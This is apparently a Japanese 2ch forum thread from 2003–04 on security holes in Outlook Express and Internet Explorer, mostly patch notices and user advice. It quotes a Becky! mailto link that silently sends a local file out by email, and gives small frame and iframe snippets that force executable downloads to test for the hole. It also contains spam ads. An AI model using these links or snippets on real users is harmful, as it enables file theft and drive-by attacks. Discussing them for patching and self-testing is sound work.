OE(又はIEコンポーネント使用メーラー)の問題点とその対策方法
381 :
名無しさん@お腹いっぱい。 :
03/03/06 08:54 HotmailとOutlook Expressの組み合わせでウィルス感染する人が多いのでまとめておく。 Hotmailはウィルスチェックをしているとはいうものの、 それはブラウザでHotmailにアクセスした場合に添付ファイルを開く際にチェックするというもので、 メールボックスに入る前に添付ファイルをスキャンするプロバイダのウィルスチェックサービスとは異なる。 さらにOutlook ExpressでHotmailを受信する設定にしているとこのHotmailのウィルスチェック機能は働かず そのままOutlook Expressのフォルダにウィルスが入ってきてしまう。 またアンチウィルスソフトもメール受信時のスキャンはPOP3のみでHotmailなどのWebメールに対しては行われないので、 この時点でアンチウィルスソフトを常駐させていても反応しない。 ただしアンチウィルスソフトが常駐している場合は、添付ファイルを開くときに反応する。 したがって、Hotmailがウィルススキャンをしているから大丈夫だと誤解して、アンチウィルスソフトを常駐させずに Outlook ExpressでHotmailを受信する設定にしている場合、ウィルスの添付ファイルは素通りしてくるので、 添付ファイルを開くと感染する。セキュリティホールがある場合には開かなくても感染する。
まとめ 1、HotmailはOutlook Expressで受信せずにブラウザで見に行く。 ブラウザもOperaやNetscape等のInternet Explorer以外のものが望ましい。 2、アンチウィルスソフトは必ず導入して常駐させておく。ウィルス定義ファイルは常に最新にしておく。 3、Internet Explorer・Outlook ExpressはWindowsUpdateで常に最新の状態にしておく。
383 :
bloom :03/03/06 09:12
>>381 > HotmailとOutlook Expressの組み合わせでウィルス感染する人が多いのでまとめておく。
> Hotmailはウィルスチェックをしているとはいうものの、
> それはブラウザでHotmailにアクセスした場合に添付ファイルを開く際にチェックするというもので、
> メールボックスに入る前に添付ファイルをスキャンするプロバイダのウィルスチェックサービスとは異なる。
> さらにOutlook ExpressでHotmailを受信する設定にしているとこのHotmailのウィルスチェック機能は働かず
> そのままOutlook Expressのフォルダにウィルスが入ってきてしまう。
知らなかった
Hotmailだけの為にOEを使い続けていたけど意味なかったのか
385 :
名無しさん@お腹いっぱい。 :03/03/07 13:03
>>384-385 テストウィルス"eicar"でテストしてみ。OEだとさっくり入ってくるよ。
でもブラウザでHotmailに行くと、添付ファイルをクリックした時に
「感染しています。どうしますか?」みたいなことを聞いてくる。
387 :
名無しさん@お腹いっぱい。 :03/03/07 17:53
>>381 アンチウィルスソフトって一旦受信したOEのフォルダは
スキャンから除外してるから、
Hotmail経由でOEのフォルダにウィルスが入ってても、
スキャンしたときでも発見されないよね。
んでローカルにウィルスがあるといろいろ危ないよね。
なんかの拍子にアンチウィルスソフトが常駐でなくなったときに
クリックでもしたら大変。
OEでHotmail使うのはやめよう。
388 :
名無しさん@お腹いっぱい。 :03/03/11 10:24
保守
390 :
名無しさん@お腹いっぱい。 :03/03/14 08:45
>>372 の不具合まだ修正されないのかなぁ。
長文のメール書いてるとOEが落ちるから、結構ショックだよね。
392 :
MS03-007 :03/03/18 08:23
393 :
名無しさん@お腹いっぱい。 :03/03/18 16:55
age
394 :
MS03-007 :03/03/19 17:23
396 :
名無しさん@お腹いっぱい。 :03/03/19 22:44
397 :
名無しさん@お腹いっぱい。 :03/03/20 10:47
400 :
名無しさん@お腹いっぱい。 :03/03/20 12:33
401 :
名無しさん@お腹いっぱい。 :03/03/20 17:32
403 :
名無しさん@お腹いっぱい。 :03/03/24 12:13
age
404 :
MS03-007 :03/03/26 08:08
406 :
MS03-010 :03/03/27 10:48
「MS03-010: RPC エンドポイント マッパーの問題により、サービス拒否の攻撃が実行される (331953)」
http://www.microsoft.com/japan/technet/security/bulletin/ms03-010ov.asp ○概要
この問題は、下記製品のリモート プロシージャ コール (RPC: Remote
Procedure Call) のエンドポイント マッパーに問題があり、サービス拒否の
攻撃を受ける可能性があります。その結果、悪意のあるユーザーにお客様の
コンピューター上のサービスを停止させられる可能性があります。
○対象となる製品
・Microsoft Windows NT 4.0
・Microsoft Windows 2000
・Microsoft Windows XP
407 :
名無しさん@お腹いっぱい。 :03/03/27 14:55
408 :
MS03-007 :03/03/27 17:24
409 :
名無しさん@お腹いっぱい。 :03/04/07 19:24
410 :
MS03-011 :03/04/10 11:40
411 :
名無しさん@お腹いっぱい。 :03/04/10 13:06
>>410 これ5MBもあるし、鯖が混んでるのか、なかなか落ちてこないね。
412 :
名無しさん@お腹いっぱい。 :03/04/16 10:07
413 :
名無しさん@お腹いっぱい。 :03/04/16 19:14
414 :
MS03-013 :03/04/17 08:18
415 :
名無しさん@お腹いっぱい。 :03/04/17 10:13
(^^)
417 :
名無しさん@お腹いっぱい。 :03/04/17 12:38
age
∧_∧ ( ^^ )< ぬるぽ(^^)
sage
420 :
名無しさん@お腹いっぱい。 :03/04/21 18:10
>>414 のセキュリティパッチいれるとXpのIE6が使い物にならないくらい遅くなるから注意。
アンインストールで元に戻った。
421 :
名無しさん@お腹いっぱい。 :03/04/21 19:20
422 :
名無しさん@お腹いっぱい。 :03/04/21 21:28
>>421 俺の場合はIEだけ遅くなった。
パッチID(811493)調べるためにMS03-013のページ開こうとして20分かかった。(通常は10数秒)
その間CPUは100%振り切り(時々CPUステータスのゲットすら出来ない)
コーポレート契約のマカ4.5.1が入ってる。
425 :
名無しさん@お腹いっぱい。 :03/04/23 11:13
>>410 MS03-011関連
Microsoft VMのサポートは2003年末まで,求められるアンインストール機能
相次ぐWindows Updateのトラブル,トラブル情報の周知を
今週のSecurity Check [Windows編] (第93回,2003年4月23日)
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20030422/1/ ・Microsoft VMに「緊急」のセキュリティ・ホール
・Microsoft VMのサポートは2003年末まで
・トラブルが続出するWindows Update
・Windows カーネルにホール,パッチ適用でパフォーマンスの低下も
・ISA Serverにセキュリティ・ホール
・Indexing Server for Windows NT 4.0用パッチが公開
・TechNet Online セキュリティでは“月例”ドキュメント
426 :
名無しさん@お腹いっぱい。 :03/04/24 10:31
427 :
名無しさん@お腹いっぱい。 :03/04/24 10:54
428 :
名無しさん@お腹いっぱい。 :03/04/24 11:45
ちょっと前にMS03-014のパッチに問題があって異常終了するって有ったけど それはもう改善されてんの? もうMS03-014あてても大丈夫?
429 :
名無しさん@お腹いっぱい。 :03/04/24 11:49
430 :
名無しさん@お腹いっぱい。 :03/04/24 11:50
431 :
名無しさん@お腹いっぱい。 :03/04/24 11:54
オペレーターとチャットで相談って使えんの? 今、初めて知ったんだけど。
432 :
名無しさん@お腹いっぱい。 :03/04/24 11:55
>>428 MS03-004だろ。
>>365 改善されてないよ。
MS03-014にMS03-004の不具合の修正がされてればいいのだが、詳細不明。
433 :
名無しさん@お腹いっぱい。 :03/04/24 11:59
ここのところMSはパッチのリリースの速さの方に重点を置いている
ようなので、あわててパッチを当てない方が賢明。
しばらくして不具合報告がないようなら当てる、
自分に必要なパッチかよく検討してみてから当てる(
>>423 )、が吉。
もっとも、全くWindowsUpdateもしないで素のIE5.01とか使ってるのは論外。
435 :
MS03-014,MS03-015 :03/04/24 12:54
436 :
名無しさん@お腹いっぱい。 :03/04/24 17:24
age
437 :
MS03-007 :03/04/24 17:46
441 :
名無しさん@お腹いっぱい。 :03/04/25 10:56
age
Sunの最新JavaランタイムがIEで使えないことが判明したんで SunのをウンインスコしてMS-VMを最新にしたところ セキュ確認済みの未認可AxtiveXが動かない そこでサンドボックス限定で許可したらOK とゆーことは SunのプラグインはOSのセキュ設定レベル見てない サイト鯖自体のセキュ区分で許可の有無はできるが こういうあいまいな部分で素通しなのか ネスケみてえだ
443 :
名無しさん@お腹いっぱい。 :03/05/02 13:39
結局shurikenpro買ったよ
445 :
名無しさん@お腹いっぱい。 :03/05/03 17:39
Becky! なら安心と思ったら大間違い。セキュリティホールが見つかりました。
http://slashdot.jp/security/03/05/02/2151212.shtml?topic=16 65 名前:名無しさん@お腹いっぱい。 投稿日:03/05/03 17:26 ID:nWmKJb8r
おまいら、大変です!!
mailto:
[email protected] ?X-Becky-Attachment=C:/Program%20Files/Katjusha/kakikomi.txt
&X-Becky-Action=send&subject=End_of_the_life&body=moudamepo
こんなリンクが張られたら一巻の終わりじゃないですか?
すぐにかちゅーしゃのインスト先を変えるか、mailto:設定を変えましょう!!
67 名前:65 投稿日:03/05/03 17:29 ID:nWmKJb8r
補足。
>>45 みたいのだと送信前に確認ダイアログが開くけど、
subjectとbodyを付けると確認なしでメールが送られてしまいます。
だから最新パッチあててるOEの方が安全だってば。
447 :
名無しさん@お腹いっぱい。 :03/05/03 17:52
450 :
名無しさん@お腹いっぱい。 :03/05/12 17:06
451 :
動画直リン :03/05/12 17:10
453 :
名無しさん@お腹いっぱい。 :03/05/15 23:43
454 :
名無しさん@お腹いっぱい。 :03/05/16 00:56
>>455 >IEに危険なセキュリティ・ホール,スクリプトを無効にしても攻撃を受ける
これはスゴ過ぎる!
H系DLに紛れ込んで何でもやり放題?
457 :
名無しさん@お腹いっぱい。 :03/05/19 20:51
Hotfix出てないんかい
>>453 >>455 やばいやん、それって。幾らなんでもあまりにも。
最近出た中では、一番嫌っすね。
Redlofみたいなhtmlファイル汚染系ウイルスに組み込ませたら、楽しげですが。
27才人妻です。ダンナがかまってくれないので、いつも一人でオナってます。
でも、けっこうオカズに困るんですよね。そんな時見つけたのがYUIS!!
安いし、安心して買えるしなかなかいいですよ!いつもバイブ物買ってます!
http://www.dvd-yuis.com/
ファイルのダウソ禁止してダウソはツール使うしかなさげだな。
Opera使いの俺はだいじょうび
463 :
cheshire-cat ◆CATBCJABLA :03/05/19 22:41
プロバとどゆ回線契約してるかとか、パソの性能もアリっすかね。 下痢後の酒はちょい体にこたえて。 ちょい吐いてきまする。
>>459 やってみたけど
途中でieがエラー吐いて落ちる。
非力なマシンだと大事にはいたらないのかな?
>>465 (・3・) エェー スラッシュ.に同じような報告あったYO
>>459 のデモ
「現在のセキュリティではDLできません」のダイアログ永遠に開きまくり
IE落としたら「ダウンロードを中止していいですか?」だってw
<FRAME SRC="C:\winnt\****.exe"></FRAME> こんなの並べてるだけでかいな
これマジでやばいよ
Irvineのクリックキャッチを有効にしとくと 1個ずつしかダイアログが出なくなるから大丈夫げ
━―━―━―━―━―━―━―━―━[JR山崎駅(^^)]━―━―━―━―━―━―━―━―━―
470 :
(≡゜♀゜≡)) :03/05/22 02:38
472 :
名無しさん@お腹いっぱい。 :03/05/28 12:06
ここのところパフォーマンスダウンの問題で、いまだFIXされない奴 溜まってるのに。。
そろそろ新OS出すために バグをちらほらと小出しにしてる感じだな
476 :
名無しさん@お腹いっぱい。 :03/05/29 00:11
age
477 :
名無しさん@お腹いっぱい。 :03/05/29 10:21
最善の対策:MSOE使うな。 --------------------------終了----------------------------
478 :
名無しさん@お腹いっぱい。 :03/05/29 12:16
>>478 メモ帳以外にあるか?メモ帳以上にいいメーラーがあったら知りたいもんだ。
厨な質問なんですが、ドーナツPしか使ってないんだけどIEのパッチ当ててないと まずいんですか?
>>480 DonutPはIEコンポーネントブラウザです
>>481 まずいってことですね?
イマイチその言葉の意味がよくわからんで、、、
パッチ当てて出直してきます。
483 :
名無しさん@お腹いっぱい。 :03/06/02 21:31
485 :
名無しさん@お腹いっぱい。 :03/06/03 09:28
OEは常にウイルスのターゲットになるからやめとけ
>>478 Edmaxフリー版とか
>>479 どうやってメモ帳をメーラーとして使うんだよ
>>485 「交通事故を起こすので車に乗るのをやめましょう。」って感じの記事だな。
完全にウィルスメールを無くすには以下の仕様のメールソフトになると思う。
・プレーンテキストのみ
・ファイル添付不可
・ハイパーリンク不可
>>485 HTMLメールもウザイが特定のフォントやサイズ以外だと
書式が崩れるメールも止めて欲しい。
>>486 >どうやってメモ帳をメーラーとして使うんだよ
電信8号
EdMAXはメッセージを来たままの状態で保存しないから、糞。
491 :
名無しさん@お腹いっぱい。 :03/06/04 10:19
492 :
名無しさん@お腹いっぱい。 :03/06/04 10:38
先生方よろしくお願いします。 メールソフトは outlook expressを使用していますが 受信メール、送信メールが全て無くなっています。 何日か前にブラクラ踏んでしまい、その後受信メールだけが全て 無くなっており、何日か過ぎました。 そして今日その間に届いていた受信メール+送信メールが無くなって いました。 原因は先日踏んだブラクラなのでしょうか? そしてほっておくとまたこのような事がおきるのでしょうか? 良きアドバイスお願いします。
>>492 諦めて、OEを再インスコすれ
その際にウィルススキャンするのも忘れずに
495 :
名無しさん@お腹いっぱい。 :03/06/04 10:53
496 :
名無しさん@お腹いっぱい。 :03/06/04 11:38
497 :
MS03-020 :03/06/05 09:24
MS03-020: Internet Explorer 用の累積的な修正プログラム (818529)
http://www.microsoft.com/japan/technet/security/bulletin/MS03-020ov.asp ●概要
この修正プログラムは、Internet Explorer に影響を及ぼすセキュリティ上の
問題を排除する累積的な修正プログラムです。
以前に公開された MS03-015 : Internet Explorer 用の累積的な
修正プログラム (813489) で修正された問題に加えて、新たに 2 つの問題を
排除します。
●対象となる製品
・Internet Explorer 6、6 Service Pack 1
・Internet Explorer 5.5 Service Pack 2
・Internet Explorer 5.01 Service Pack 3 for Windows 2000
注意: Internet Explorer 5.01 Service Pack 3 の修正プログラムは、
Windows 2000 環境にのみ適用可能です。
499 :
名無しさん@お腹いっぱい。 :03/06/05 13:16
500 :
名無しさん@お腹いっぱい。 :03/06/05 13:37
501 :
名無しさん@お腹いっぱい。 :03/06/05 15:01
>>498 って
>>455 の
"IEに危険なセキュリティ・ホール,スクリプトを無効にしても攻撃を受ける"
のIEでオーバーフロースタック利用してバックグラウンドでDL実行の
Fixですよね?
>>453 のゾーン無視の方はどうなってるのだろ。。。
502 :
名無しさん@お腹いっぱい。 :03/06/05 15:35
私も便乗でお尋ねしたいのですが、
>>453 の「ゾーン無視」や
>>455 の「スクリプトを無効にしても・・・」って、
「IFRAMEのプログラムとファイルの起動」を全ゾーン
(「マイコンピュータ」を含む)で無効にしててもダメですかね?
>>501 ,
>>501 スタックオーバーフローじゃない。大量にダイアログ開こうとしてリソースが足りなくなって失敗する。
IEはそれを「開く」が選択されたと誤解する。シマンテックの「ゾーン無視」は誤り。
どちらもMS03-020で直る(はず)。
>>502 どんなに制限してもIEオプションでは非表示の
"zone 0"→My computerがあるからダメじゃない?
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
以下各ゾーン見れば解るよ
>>505 ふつー、この板の住人ならセキュリティセッティングに「マイコンピュータ」が出てくる。
あ! マイコンピューターもちゃんと視野に入ってるのね
>>502
>>507 そうでぃ〜す! いずれにしても、レスありがとうございます。
まぁ他人に聞いてばかりいないで自分で試せばいいのか
と思って
>>459 のサンプルページ見に行ったのですが、
もうありませんでした。ざんねん。
>>508 ↓こんな感じでテストすればいい。ダウンロードダイアログが出たら負け。
>>502 の設定じゃ出てくるから負け。
<html>
<body>
<iframe src="file://c|/windows/notepad.exe">
</iframe>
</body>
</html>
>>509 さっそくやってみました。たしかに出ました、ダイアログが!
な〜るほど、こういうことなんですねぇ・・・。
ありがとうございますた。
511 :
名無しさん@お腹いっぱい。 :03/06/05 23:34
512 :
名無しさん@お腹いっぱい。 :03/06/06 10:39
513 :
名無しさん@お腹いっぱい。 :03/06/07 00:27
age
514 :
名無しさん@お腹いっぱい。 :03/06/09 22:49
age
516 :
名無しさん@お腹いっぱい。 :03/06/10 12:42
【川崎憲次郎投手をオールスターに!】
ヤクルト時代は88勝を挙げ'98には最多勝のタイトルを獲得。特に巨人戦には滅法
強く、現役最多の勝利数を誇る。'00年オフにFA権を行使し打倒読売、そして優勝
請負人として満を持して中日入団。
背番号20は元祖燃える男・星野仙一が着けていた番号だった。
しかしここからが苦難の始まりだった。 度重なるケガ。
エースとしての働きを期待されながら2軍で、練習すらできない日々。
2年間一軍で1球も投げていない。
ファンはその巨人キラーの異名と熱い期待をいまだに忘れることができない。
3年契約の3年目、ようやく傷も癒え練習を再開。彼にふさわしい舞台とは?
そう彼に相応しい復活の舞台はオールスターだ!
↓【憲次郎への投票はこちらから】↓
http://allstar.sanyo.co.jp/ 6月10日時点の選手別投票数
http://allstar.sanyo.co.jp/result/detail.html
518 :
名無しさん@お腹いっぱい。 :03/06/15 23:10
>>520 Operaもだめみたい
mozillaは大丈夫
>>520 氏ね厨房
大質量IFRAME
iframe タグが大量にあります。
高い確率で悪意があるものと考えられます。
ヽ(`Д´)ノ ウワァァァァーーーーーーン!!!
>>520 任意のアプリケーションが実行されるセキュリティホールは対策したが
ファイルのダウンロードが表示されてブラクラ状態になるのは放置ですね。
大量のウィンドウ表示を制限する機能をWindowsに付けて欲しいよ。
525 :
名無しさん@お腹いっぱい。 :03/06/17 13:19
ウインドーズ98は、もう更新できないのでしょうか? 更新しようとしても、98についの説明がありません。 それと、インテリマウスがしょっちゅう自動的にクリック するようになってしまうのはブリクラと関係があるのでしょうか? 壊れ始めているよ〜だ! SOS, SOS, , ,
526 :
名無しさん@お腹いっぱい。 :03/06/17 13:29
527 :
名無しさん@お腹いっぱい。 :03/06/17 13:40
おっ、Piggybackで止まった
直リンもやめるべきだろう。
>>520 のメール欄を見る限りは確信犯。
531 :
名無しさん@お腹いっぱい。 :03/06/17 23:34
age
532 :
名無しさん@お腹いっぱい。 :03/06/18 09:59
534 :
名無しさん@お腹いっぱい。 :03/06/19 00:16
あげ
>>533 OSごと落ちる9x系
MS的には「昔そんなのありましたっけ?さっさとXP買ってね」
まあ優先は他の穴だとは思うけどさ
537 :
名無しさん@お腹いっぱい。 :03/06/19 21:34
Win2k/XPなら制限付きユーザーでブラウズすると、 IEが危険とされる理由のひとつである、「勝手にバイナリを ダウンロードして実行したりインストールしたりする機能」が 署名の有無やゾーンにかかわらず完全に無効になるから かなり安全になる。
539 :
名無しさん@お腹いっぱい。 :03/06/20 00:30
age
540 :
名無しさん@お腹いっぱい。 :03/06/22 20:27
あげ
_, ._ ( ゚ Д゚) ( つ O ガシャ と_)_) __ (__()、;.o:。 ゚*・:.。
542 :
名無しさん@お腹いっぱい。 :03/06/25 19:27
age
543 :
名無しさん@お腹いっぱい。 :03/06/26 05:09
IE/OEとは直接関係ないが、
「MS03-021: Windows Media Player の問題により、メディアライブラリがアクセスされる (819639) 」
http://www.microsoft.com/japan/technet/security/bulletin/MS03-021ov.asp ●対象となる製品
・Microsoft Windows Media Player 9 Series
・Microsoft Windows Media Player on Windows Server 2003
●以下の製品はこの問題の影響を受けません。
・Microsoft Windows Media Player 6.4
・Microsoft Windows Media Player 7.1
・Microsoft Windows Media Player for Windows XP
544 :
名無しさん@お腹いっぱい。 :03/06/26 23:24
545 :
IE5.5SP2日本語版 :03/06/27 00:44
>>545 ODNのCD-ROMを店からもらってきた方が後々いいかもしれない
>>545 Meのサポートが終了するまでという名目で復活させたようだが
やはりMicrosoft VMが入ってるからというのが真相だろうな
そういや控訴審はどうなったんだ? 今月あたり判決が出るはずなんだが
>>545 ie5setup.exeはダウソできたものの、Download Siteに接続するとすぐエラーになってしまう。
cab一式はサーバから削除されてしまってるんじゃないか?
>>550 そうか。じゃ、やっぱりODNのCD-ROM貰ってくるしかないか…
553 :
名無しさん@お腹いっぱい。 :03/06/28 19:39
WIN98だが、もうすぐアップデートできなくなるらしい。 DirectX 9.0a ?(DirectX 9.0a には、セキュリティとパフォーマンスを向上するための 更新と、DirectX テクノロジのすべてにわたる新機能が含まれていますという説明の もの)、ダウンロードしておいたほうが良い? ダウンロードしてなにか問題がなかったでしょうか? あったような?
555 :
名無しさん@お腹いっぱい。 :03/06/28 20:00
557 :
名無しさん@お腹いっぱい。 :03/07/02 11:22
OEを糞といってた諸君、一言どうぞ。
559 :
名無しさん@お腹いっぱい。 :03/07/04 06:15
Outlook Express6SP1を使っています。 ツール<オプション<メンテナンス<最適化で以下のメッセージが表示されました。 いままで一度も出たことがありません。 このメッセージについて情報をお持ちの方はいらっしゃいませんでしょうか。 Outlook Expressのフォルダは別ドライブに移動してありますが、 移動後もこれまではうまく動いたと記憶しています。 環境はxpsp1 関係ありそうなアプリはVB2003、ZoneAlarm(フリー版3.7.193)でしょうか。 ちょっと気持ちが悪いので情報提供方よろしくお願いします。 --------------------------- Outlook Express --------------------------- Outlook Express またはほかのアプリケーションがこのフォルダを使用しています。 --------------------------- OK キャンセル ---------------------------
追加です。 アプリとしては上記のほか、 SpywareBlaster(スパイウエアブラスター)でオールチェック Spybot(スパイボット)で免疫化適用 AdAware(アドアウエア)で定期チェック です。 よろしくお願いします。
>>558 HTMLプレビューを許可した状態なら起きるというので、わざと切り替えない限りはOEよりは可能性は低い。
↑ (;´Д`)
563 :
名無しさん@お腹いっぱい。 :03/07/04 22:28
>>559 最適化中に送受信が入るとそのメッセージが出る。
564 :
名無しさん@お腹いっぱい。 :03/07/05 00:11
>>561 OEはだいぶ前に対策済みでプレビュー許可しても発生しませんが、何か?
OEが塞いだ後も指摘されるまで放置してたという事は、OEが塞いだ他の穴も
放置されてる可能性が高いという事ですな。
>>563 やはりそうですか。そんな感じはしていました。
受信は当時1分間隔でチェックに設定していました。
それにしても、受信を完了させた直後でも上記の現象が出ていました。
現在はなぜか治りましたが、未知のスパイかウイルスかその類を
知らずに飼育していたのかもしれないと思って、
気持ち悪くて質問しました。検索はかなりしました。
現象が再発したらまたお尋ねしたく思います。
566 :
名無しさん@お腹いっぱい。 :03/07/05 18:54
>>556 おお、ありがとう。
私は普段はセキュリティ板しか見ていないので、、(反省)。
亀レスになってしまいました(汗)。
567 :
名無しさん@お腹いっぱい。 :03/07/08 00:33
問題点は、OEは対策されるまで公表されない場合が多い。 他のメーラはOEで公表後、後追いでの対策になる。
> OEは対策されるまで公表されない場合が多い。 あたりまえだろ、対策前に公表されたらアタックされるぞ
まぁ、公表されても見ないあほが多いけどな。
571 :
名無しさん@お腹いっぱい。 :03/07/08 11:44
572 :
名無しさん@お腹いっぱい。 :03/07/08 13:47
>>571 Windows ME + IE 6 SP1でも、アドレスバーに c:\aux と入力して
enter すると IE 6 SP1がフリーズした。
573 :
(;´Д`) :03/07/08 14:33
574 :
名無しさん@お腹いっぱい。 :03/07/08 21:49
575 :
名無しさん@お腹いっぱい。 :03/07/10 15:52
578 :
名無しさん@お腹いっぱい。 :03/07/10 23:57
579 :
名無しさん@お腹いっぱい。 :03/07/11 15:12
>>579 関係ないだろ、スレのタイトル読めない?
>580 脳みそがクラックされてるから仕方ない
>>579-581 IE/OEの代替でOpera勧める人がいるから、貼っといても無駄ではないと思う。
>>583 だったらOperaのスレでやってくれ。
ここはIE/OE使う人のためのスレ。
__∧_∧_ |( ^^ )| <寝るぽ(^^) |\⌒⌒⌒\ \ |⌒⌒⌒~| 山崎渉 ~ ̄ ̄ ̄ ̄
保守
588 :
名無しさん@お腹いっぱい。 :03/07/15 17:02
>>585 IE/OE使う人だけのためのスレじゃなくて、
より安全なブラウザ・メーラを建設的に話すスレ
>>1 でもあったんじゃない?
IE/OEの話題がメインだとしても。
↑Unpatched IE security holes
>>588 IEコンポーネントの話ならともかく
Opera自体については完全にスレ違い。
そういったことはOperaのスレッドでどうぞ。
いつのまに"IE/OE使う人のためのスレ"になったんだ…
>>592 Operaの話題はOperaのスレでやれってことでしょ?
それとスレは君の私有物ではないよ
セキュリティパッチ情報集積所でも立てるか
漏れも全部一緒のほうがありがたい
600げっっとーーーーーおぉ!!
∧_∧ ∧_∧ ピュ.ー ( ・3・) ( ^^ ) <これからも僕たちを応援して下さいね(^^)。 =〔~∪ ̄ ̄ ̄∪ ̄ ̄〕 = ◎――――――◎ 山崎渉&ぼるじょあ
hage
>>599 とっくに対策されてるがそこに書かれている対処自体は
実行したほうがいい。
面倒ならWindows Update以外は常に制限ユーザーでIEを使え
604 :
名無しさん@お腹いっぱい。 :03/08/13 14:14
いろいろ読ませてもらったけど、つまるところ OEであれIEコンポーネント使用メーラーであれ、 IEと連携しないように、すべてのメッセージをテキスト形式で受信すれば 何ら問題ないわけですね。
>>604 違う。セキュリティホールを考慮してない。
すべてテキスト形式で受信するなら IEコンポーネントいらないじゃん
607 :
名無しさん@お腹いっぱい。 :03/08/15 20:12
(⌒V⌒) │ ^ ^ │<これからも僕を応援して下さいね(^^)。 ⊂| |つ (_)(_) 山崎パン
(・3・) エェー
613 :
名無しさん@お腹いっぱい。 :03/09/11 10:19
614 :
名無しさん@お腹いっぱい。 :03/09/11 13:34
616 :
名無しさん@お腹いっぱい。 :03/09/20 00:57
617 :
名無しさん@お腹いっぱい。 :03/10/04 19:10
618 :
名無しさん@お腹いっぱい。 :03/10/05 23:26
619 :
名無しさん@お腹いっぱい。 :03/10/06 17:07
620 :
名無しさん@お腹いっぱい。 :03/10/17 09:20
622 :
名無しさん@お腹いっぱい。 :03/11/08 06:27
IEを起動するとthesten.comという外国のアダルトサイトがホームページになっていて、 お気に入りに3つのそのサイトへのリンクが毎回入っています。 履歴やクッキーやゴミ箱の内容など全て消去しても絶対に起動したときに表示されます。 どのたか改善方法を教えてください。
↑ミス Internet Explorer 6 SP1 用の累積的な修正プログラム (KB824145) が出ているので、各自WindowsUpdateされたし。 現時点ではTechNetに情報なし。
626 :
SMTP信号機 :03/11/12 03:06
627 :
名無しさん@お腹いっぱい。 :03/11/12 14:27
MS03-048 - Internet Explorer 用の累積的なセキュリティ更新 (824145)
http://www.microsoft.com/japan/technet/security/bulletin/MS03-048.asp ●影響を受けるソフトウェア
・Microsoft Windows 98 Second Edition
・Microsoft Windows Millennium Edition
・Microsoft Windows NT Workstation 4.0
・Microsoft Windows NT Server 4.0
・Microsoft Windows NT Server 4.0, Terminal Server Edition
・Microsoft Windows 2000
・Microsoft Windows XP
・Microsoft Windows XP 64 bit Edition
・Microsoft Windows XP 64 bit Edition Version 2003
・Microsoft Windows Server 2003
・Microsoft Windows Server 2003 64 bit Edition
●影響
リモートからのコード実行
629 :
名無しさん@お腹いっぱい。 :03/11/12 14:40
>>1 選択肢
(1)Datula、Netscape7.1 Mail、Edmaxなどを使う
630 :
名無しさん@お腹いっぱい。 :03/11/12 14:57
q824145.exe /q:a /r:n これも出来たとはな (´ー`) フッ
誤爆したぜ
633 :
名無しさん@お腹いっぱい。 :03/11/19 19:53
634 :
名無しさん@お腹いっぱい。 :03/11/29 20:24
635 :
名無しさん@お腹いっぱい。 :03/11/30 01:40
最近のウイルス対策製品も IE の御世話になってるもの多い感じだけど どうなの?
> 最近のウイルス対策製品も IE の御世話になってるもの多い感じだけど > どうなの? まぁ、Windows自体に依存してるからね…。 WindowsがIEにも依存してるし。 <= help等
>> 637 そうだねー。でも OS が web browser に依存しているというのは。 完全に逆なんじゃないのかなあ? 少なくともセキュリティー関連のものは独自の仕組で アップデートとか出来た方が安心だと思うのは間違いだろうか。 だからといって完璧ではないだろうけど、若干ましな気がする。
639 :
名無しさん@お腹いっぱい。 :03/12/03 14:31
640 :
名無しさん@お腹いっぱい。 :03/12/11 21:36
>>640 ちなみに、Opera7.23ja(3226)だとセキュリティ警告のダイアローグが出る。
642 :
名無しさん@お腹いっぱい。 :03/12/12 18:06
>>641 Opera6.06でも警告を確認。
これ、ある意味新ウイルスに使われそうなのに、マイクロソフトは危険度低なのね・・・
JokeVirusってどうやって解除するんですか?
645 :
名無しさん@お腹いっぱい。 :03/12/20 03:18
@impoでcss読み込んじゃうなんて何考えてんだろうな
646 :
名無しさん@お腹いっぱい。 :03/12/26 06:41
こんにちは。MLM・NB初心者です。
詳しい方や現在もしくは過去MLM・NBをやられていた方の
ご意見が聞きたくてページ作りました。
よろしくお願いします。
つまらない物ですが、お礼の品も用意しておりますので
ぜひ、どうぞ!
http://gonbea.fc2web.com/
647 :
名無しさん@お腹いっぱい。 :04/01/10 22:26
648 :
名無しさん@お腹いっぱい。 :04/01/14 23:22
649 :
名無しさん@お腹いっぱい。 :04/01/21 18:24
650 :
名無しさん@お腹いっぱい。 :04/01/28 19:48
651 :
名無しさん@お腹いっぱい。 :04/01/28 20:53
652 :
名無しさん@お腹いっぱい。 :04/01/30 18:33
653 :
名無しさん@お腹いっぱい。 :04/02/01 15:55
654 :
名無しさん@お腹いっぱい。 :04/02/02 00:38
IEもうだめぽ
655 :
名無しさん@お腹いっぱい。 :04/02/03 04:14
レベル緊急。 MS04-004 - Internet Explorer 用の累積的なセキュリティ修正プログラム (832894)
656 :
名無しさん@お腹いっぱい。 :04/02/03 10:05
>>656 影響を受けるソフトウェア :
Microsoft Windows NTR Workstation 4.0 Service Pack 6a
Microsoft Windows NT Server 4.0 Service Pack 6a
Microsoft Windows NT Server 4.0 Terminal Server Edition, Service Pack 6
Microsoft Windows 2000 Service Pack 2, Service Pack 3, Service Pack 4
Microsoft Windows XP, Microsoft Windows XP Service Pack 1
Microsoft Windows XP 64-Bit Edition, Microsoft Windows XP 64-Bit Edition Service Pack 1
Microsoft Windows XP 64-Bit Edition Version 2003
Microsoft Windows ServerR 2003
Microsoft Windows Server 2003, 64-Bit Edition
テストした Microsoft Windows および Officeコンポーネント :
Internet Explorer 6 Service Pack 1
Internet Explorer 6 Service Pack 1 (64-Bit Edition)
Internet Explorer 6 Service Pack 1 for Windows Server 2003
Internet Explorer 6 Service Pack 1 for Windows Server 2003 (64-Bit Edition)
Internet Explorer 6
Internet Explorer 5.5 Service Pack 2
Internet Explorer 5.01 Service Pack 4
658 :
名無しさん@お腹いっぱい。 :04/02/03 10:17
659 :
名無しさん@お腹いっぱい。 :04/02/03 11:11
今回のパッチは良く考えてからインスコした方が良さげ スクロールはかちゅにも影響してるので直したいのだがw
661 :
名無しさん@お腹いっぱい。 :04/02/03 23:34
662 :
名無しさん@お腹いっぱい。 :04/02/04 01:59
そもそもブラウザに記録させるようなPASSに、 PASSの意味はあるのかあと小一時間は問い詰めない。
665 :
名無しさん@お腹いっぱい。 :04/02/05 22:40
ofiice ofiice ofiice ofiice ofiice ofiice ofiice ofiice ofiice ofiice ofiice ofiice ofiice ofiice ofiice ofiice ofiice ofiice ofiice ofiice
666 :
名無しさん@お腹いっぱい。 :04/02/09 00:42
